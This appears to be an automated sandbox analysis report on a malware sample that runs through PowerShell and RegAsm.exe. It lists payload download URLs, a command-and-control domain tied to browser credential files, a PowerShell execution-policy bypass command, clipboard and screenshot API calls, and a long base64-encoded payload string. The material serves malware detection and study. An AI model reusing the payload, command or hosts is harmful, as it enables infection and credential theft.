Source: powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004A38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/ilk.exe
Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/nghp.exe
Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/nghp.exe4
Source: powershell.exe, 00000004.00000002.4105665571.0000000006DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/nghp.exeT
Source: powershell.exe, 00000004.00000002.4105665571.0000000006DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/nghp.exeTp
Source: powershell.exe, 00000004.00000002.4100255079.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.448
Source: powershell.exe, 00000004.00000002.4110820466.00000000708D1000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
Source: powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000007.00000002.4207908968.0000000000E11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 00000004.00000002.4100255079.00000000046E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000004.00000002.4100255079.00000000046E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 00000004.00000002.4100255079.000000000504B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: RegAsm.exe, 00000007.00000002.4207908968.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/
Source: RegAsm.exe, 00000007.00000002.4210634675.0000000003379000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/V
Source: RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/api
Source: RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/apiP
Source: RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/apiflaU.d
Source: RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/pR)D#=
Source: RegAsm.exe, 00000007.00000002.4210550709.0000000003365000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz:443/api7uiqa8.default-release/key4.dbPK
Source: RegAsm.exe, 00000007.00000002.4210550709.0000000003365000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz:443/apil
Source: powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49718 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_004310D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_004310D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

7_2_00431839

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -			Jump to behavior

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 5040, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

.NET source code contains very large strings

Source: 4.2.powershell.exe.8680000.3.raw.unpack, Sap.cs	Long String: Length: 18812
Source: 4.2.powershell.exe.4d8ab64.2.raw.unpack, Sap.cs	Long String: Length: 18812
Source: 4.2.powershell.exe.4a3acb0.0.raw.unpack, Sap.cs	Long String: Length: 18812

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043D830	7_2_0043D830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004210E0	7_2_004210E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043D0A0	7_2_0043D0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040C917	7_2_0040C917
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004361E0	7_2_004361E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00425990	7_2_00425990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00415298	7_2_00415298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042B4FC	7_2_0042B4FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040DD25	7_2_0040DD25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00422E93	7_2_00422E93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00438EA0	7_2_00438EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00435EA0	7_2_00435EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00415F66	7_2_00415F66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00419770	7_2_00419770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00408790	7_2_00408790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00426054	7_2_00426054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043B068	7_2_0043B068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00414070	7_2_00414070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043C020	7_2_0043C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00439830	7_2_00439830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041B0E1	7_2_0041B0E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041F0E0	7_2_0041F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00435890	7_2_00435890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00434098	7_2_00434098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004180A9	7_2_004180A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040A940	7_2_0040A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041714B	7_2_0041714B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00408160	7_2_00408160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042B12C	7_2_0042B12C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042F130	7_2_0042F130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004039C0	7_2_004039C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042B1C0	7_2_0042B1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041D9E0	7_2_0041D9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004111E5	7_2_004111E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004059F0	7_2_004059F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004239F2	7_2_004239F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043C1F0	7_2_0043C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040F9FD	7_2_0040F9FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043B9A1	7_2_0043B9A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00406250	7_2_00406250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041D270	7_2_0041D270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00424A74	7_2_00424A74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00409230	7_2_00409230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00423A34	7_2_00423A34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004192DA	7_2_004192DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043D2F0	7_2_0043D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043C280	7_2_0043C280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004252BA	7_2_004252BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00404370	7_2_00404370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041CB05	7_2_0041CB05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00428BC0	7_2_00428BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004143C2	7_2_004143C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00402BD0	7_2_00402BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00428BE9	7_2_00428BE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00437399	7_2_00437399
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004393A0	7_2_004393A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00416BA5	7_2_00416BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004293AA	7_2_004293AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004223B8	7_2_004223B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040B44C	7_2_0040B44C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00436C00	7_2_00436C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00423410	7_2_00423410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00404CB0	7_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004074B0	7_2_004074B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041DD50	7_2_0041DD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00418578	7_2_00418578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042D57E	7_2_0042D57E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00424502	7_2_00424502
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00421D10	7_2_00421D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041D5E0	7_2_0041D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00417582	7_2_00417582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043D580	7_2_0043D580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00427DA2	7_2_00427DA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004205B0	7_2_004205B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042C64A	7_2_0042C64A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00426E50	7_2_00426E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042B4F7	7_2_0042B4F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043462A	7_2_0043462A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00435630	7_2_00435630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004066E0	7_2_004066E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042C6E4	7_2_0042C6E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00430EF0	7_2_00430EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004256F9	7_2_004256F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00425E90	7_2_00425E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004156A0	7_2_004156A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041BEA0	7_2_0041BEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00405EB0	7_2_00405EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041C6BB	7_2_0041C6BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00409700	7_2_00409700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042C726	7_2_0042C726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042C735	7_2_0042C735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041DF80	7_2_0041DF80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00402FA0	7_2_00402FA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00414060 appears 74 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00407F70 appears 46 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: Process Memory Space: powershell.exe PID: 5040, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 4.2.powershell.exe.8680000.3.raw.unpack, Sap.cs	Base64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
Source: 4.2.powershell.exe.8680000.3.raw.unpack, Pls.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
